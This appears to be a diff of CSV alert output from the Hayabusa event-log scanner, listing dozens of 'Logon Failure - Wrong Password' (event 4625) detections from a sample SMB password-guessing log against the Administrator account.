+2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Y6Pww45qxQjrZ0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5CPU20SF5i6Cdq34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HAdaPDVTws6TObvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KUCoisntgbX7Mnis | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MFN0b769jRyDxyAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKr2OCyezvSEsHBZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QN3snXM4mwhauvvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1VpvQgnwXVxRY1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5bsnUZjpHrbD6kN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hpL2QnQ0kKqU40a6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rpkpNfeTsOeXEsJ0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5mBhuTFm02IjipEw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ908ZOCkSBC7tms | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8l7Bct5nMTZHd5mK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRk6e7SrInMDsdMV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhGByctTcM7NXGtB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BgzhW3Pd5JAB8j4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZOm1J5kdItrQpGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DK77Hylw8CJHVGvb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pf7DQVQY7AowT8NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4us3HR9jseQWIHt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJRmgooz8CXjB6E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkjIXxAvEDrPFUpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ENc8aqouBangyUrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7flMdluc8YRhOuzn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WFqeMJIXGDjDP0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iKeRDzfuDCJSv4Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gNEYkgBoG8rAE6SP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vyy1aBvh6lJBs5M5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhiWNroUS5X5AEh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg9rUUIwEfujwCvq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zfvpeyTKc3YYkVkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJGR6CYKLUJp2fWl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cmSap0AJZq0KMRBV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnVCbq1IYZF19oYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVaDMa2uNXTZNcBj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymf6Fhv5ieWwcq73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CT6YMlX1GqeEuAHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FDJ1IFpMNQ2Euhyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EGTzqnHJIiZdSgNk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: epSckAKbAp8qag89 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NNC8ilAuznKPwFvV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wObt647cIBPiVaZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nYDe1L7NNxDGQ0Vt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXroClxv7B0aCTYv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kCVah2QOH1hMSV76 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2HjD65Xy4Hppim2l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwmEQxC4iTcF4aFu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q3QxOH7ok8RR068t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJFj6Ckw1HdK9w52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qqu3Im4HXQNyGnYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bk5dmjQDnpSlREum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pk4BvYgXBR2whf80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6n1su2TUr7ONQr4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: givsEAGfG0smN9Re | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i2YuM0i7a2QuY7xb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xuocQPZpd91adY0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PvGB1dZrfDWyZoqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4oi8iL88rJo7g2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3OUnytXi4NjvqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WKkJcp3TYj31iJUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0E44RVqAE1feU0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny5LCb1qOIUhxOPY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9jcDgzzqH26DjQ1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yil94cFkU6UP24SK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkdVHF3vggCcuNdn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dRRI2CS3aVIX4nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: chDZq3VgxIE2mRb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HLVvgMmqLXKZADON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i4avO2AJSlNb0IUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mdo5CvycGvGhn33y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heJfjLl1vbX6lMjZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOP1E6hd4Jtj4gob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xa7kMCNz0bEGTBqX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
